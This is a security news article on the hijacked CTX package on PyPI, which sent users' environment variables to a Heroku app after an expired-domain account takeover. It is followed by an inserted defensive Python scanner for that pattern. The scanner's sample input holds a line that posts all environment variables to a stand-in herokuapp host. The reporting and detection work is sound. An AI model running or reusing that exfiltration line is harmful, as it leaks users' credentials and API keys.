
Malicious Python library CTX removed from PyPI repo

A malicious and potentially hijacked Python package, CTX, has been removed from the Python Package Index (PyPI) repository after social media users alerted the team to its presence.

On May 24, Indian hacker Somdev Sangwan alerted developers on Twitter to a potential security issue impacting Python’s CTX library. In a tweet, Sangwan said:

Python’s CTX library and a fork of PHP’s phpass have been compromised. Three million users combined. The malicious code sends all the environment variables to a Heroku app, likely to mine AWS credentials.

Environment variables can also include other forms of credentials and API keys.

The researcher was first made aware of the problematic package on a Reddit thread.

Malicious update

On May 22, a Reddit user with the moniker SocketPuppets said there had been a new update to CTX, a project hosted on both GitHub and PyPI.

The GitHub repository for the original project, a small Python library designed to allow simple dictionary item lookups using dot notation, has not been updated for roughly eight years.

“The OP [original poster] said it was recently updated, and on PyPI it was updated as of May 21,” Sangwan noted. “But the GitHub repo does not reflect any changes.”

He was not the only one to question the update. On the Reddit thread, users who had examined the open source project’s source code asked why environment variables were being sent to a URL – https://web.herokuapp.com/hacked – and why the GitHub repository had not been updated.

SocketPuppets said: “I created a new company account and repository for new versions so the source will be totally changed.”

SocketPuppets’ post history leads to a Medium blog and contact details that potentially link them to other GitHub repositories under the name ‘aydinnyunuss’.

As noted by Reddit user ‘antipsychosis’, the GitHub account under this name, apparently belonging to a developer/student from Istanbul’s Commerce University, is the creator of GateCracker. This software also sends requests to Heroku apps.

Expired domain

The individual responsible for uploading the malicious package to PyPI took advantage of an expired domain: they purchased the domain name and thereby obtained control of the email address registered to the original repository.

This allowed them to send a password reset email to themselves and masquerade as the original project maintainer.

Sangwan also found evidence of a phpass compromise. In total, the impacted packages have been downloaded an estimated three million times, but only users who have downloaded them within the last week or so appear to be impacted.


The CTX package, as well as other impacted libraries, have since been removed from the repository.

The Python Foundation told The Daily Swig that the compromise “was of a single user account due to re-registration over an expired domain.

“The domain that hosted the user’s email address was re-registered 2022-05-14T18:40:05Z and a password reset completed successfully for the user at 2022-05-14T18:52:40Z,” the organization added. “Original releases were then deleted and malicious copies uploaded.”

PyPI itself was not directly compromised.

In a subsequent write-up, the foundation noted that users who installed the CTX package between May 14 and May 24, 2022 were impacted. If user environment variables contain sensitive data, the organization advises rotating passwords and keys.
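As an added illustration (not code from the article, the Python Foundation or the CTX project), the following script statically scans a module's source text for the combination the Reddit users spotted by reading the code: an `os.environ` read, a network-capable import and a string URL pointing at a `herokuapp.com` host. The host list and the two sample modules are constructed for this example; the sample text is only parsed, never executed.

```python
import ast
from dataclasses import dataclass, field

# Hosts the article associates with the exfiltration endpoint (constructed list for
# this example; extend it with whatever your environment treats as suspicious).
SUSPICIOUS_HOSTS = ("herokuapp.com",)
NETWORK_MODULES = {"requests", "urllib", "http", "httpx", "socket"}


@dataclass
class Findings:
    reads_environ: bool = False
    network_imports: list = field(default_factory=list)
    suspicious_urls: list = field(default_factory=list)

    def is_suspicious(self) -> bool:
        # The CTX pattern: environment read + network capability + flagged host.
        return self.reads_environ and bool(self.network_imports) and bool(self.suspicious_urls)


def audit_source(source: str) -> Findings:
    """Statically scan one module's source text for the env-var exfiltration pattern."""
    f = Findings()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute) and node.attr in ("environ", "getenv"):
            # os.environ, os.environ.items() and os.getenv(...) all read the environment
            if isinstance(node.value, ast.Name) and node.value.id == "os":
                f.reads_environ = True
        elif isinstance(node, ast.Import):
            f.network_imports += [a.name for a in node.names if a.name.split(".")[0] in NETWORK_MODULES]
        elif isinstance(node, ast.ImportFrom) and (node.module or "").split(".")[0] in NETWORK_MODULES:
            f.network_imports.append(node.module)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if "://" in node.value and any(h in node.value for h in SUSPICIOUS_HOSTS):
                f.suspicious_urls.append(node.value)
    return f


# Constructed sample modules (scanned as text, never executed): the first mimics the
# reported CTX behaviour, the second is an ordinary environment lookup.
SAMPLE_MALICIOUS = '''import os
import requests
requests.post("https://example-app.herokuapp.com/collect", json=dict(os.environ))
'''
SAMPLE_BENIGN = '''import os
HOME = os.getenv("HOME", "/")
'''

if __name__ == "__main__":
    for name, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, audit_source(src))
```

Run it over each file under a package's `site-packages` directory to triage an installation; a hit is a reason to read the module, not proof of compromise.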

SocketPuppets/aydinnyunuss has not responded to requests for comment.

The Daily Swig has reached out to the CTX project maintainers and we will update if and when we hear back.

Source: https://portswigger.net/daily-swig/malicious-python-library-ctx-removed-from-pypi-repo
